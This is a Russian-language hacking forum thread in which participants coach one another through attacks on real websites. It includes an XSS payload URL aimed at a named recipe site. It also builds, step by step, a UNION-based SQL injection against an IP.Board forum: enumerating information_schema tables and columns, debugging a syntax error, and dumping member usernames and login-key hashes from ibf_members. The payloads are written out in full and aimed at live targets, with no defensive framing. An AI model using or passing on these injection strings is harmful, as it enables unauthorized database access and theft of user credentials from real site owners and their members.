Сиега, пихаешь в уязвимое поле свой яваскрипт, например "><script>alert()</script> и смотри в адресную строку: Code: http://www.toidutare.ee//retsept.php?otsi=1&string=&string2=&string3=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&liik= Этот линк и кидать, с другими даннымы разумеется...
Прежде чем смотреть поля, надо узнать в каких таблицах ты эти поля смотришь: union+select+table_name+from+information_schema.tables
information_schema.tables вот тут смотрю все 115 полей посмотрел ничего нет ставил стандартные название ничего пусто
попробуй например так : PHP: concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_NAME)+from+INFORMATION_SCHEMA.COLUMNS+where+table_schema+not+in+(0x696e666f726d6174696f6e5f736368656d61)+limit+0,1--+
index.php?showtopic=-24435+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.tables+limit+14,1--+ Подскажите как подставить concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_ NAME)+from+INFORMATION_SCHEMA.COLUMNS+where+table_ schema+not+in+(0x696e666f726d6174696f6e5f736368656 d61)+limit+0,1--+ в мою линк
вместо table_name засунь это: concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_ NAME) вместо information_schema.tables+limit+14,1 засунь это: INFORMATION_SCHEMA.COLUMNS+where+table_ schema+not+in+(0x696e666f726d6174696f6e5f736368656 d61)+limit+0,1
SELECT * FROM ibf_topics WHERE tid = -24435 union select 1,concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_ NAME),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28 from INFORMATION_SCHEMA.COLUMNS where table_ schema not in (0x696e666f726d6174696f6e5f736368656 d61) limit 0,1 ORDER BY last_post DESC LIMIT 0,1 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'NAME),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28 f' at line 1 вот что пишет
COLUMN_ NAME Убери форумные пробелы. Видишь же, даже в твоей мессаги появляются пробелы, которых не было вообще-то
massovka Давай линк, или иди почитай статьи. Какой смысл тупо пихать то , что тебе дали, даже не понимая зачем это? Ты пробелы не убрал (если тебе это о чём-то говорит) 2 xcedz я тебя вижу, бойся меня
index.php?showtopic=-24435+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.tables+limit+14,1--+ Вот моя сылка просматрюю все поля ничего про user password ничего нет
Доброе утро всем! Подскажите еще на один вопрос! Какой командой можно вывести все юзеров и хэш! Спасибо concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+limit+0,100/* у меня ща так
group_concat(name,0x3a3a,member_login_key) без лимита.Вроде первую 1000 знаков (если ошибаюсь-поправьте). читай тему, всё расписано.За один запрос всех не выведешь всё равно (если их много), только частями или по опр. параметрам. И в limit+0,100/* -сотня не нужна, достаточно единицы 0,1/*-дальше перебирай 1,1 -2,1 -3,1 -4,1 если просто через concat. А вообще действительно-юзай сипт.
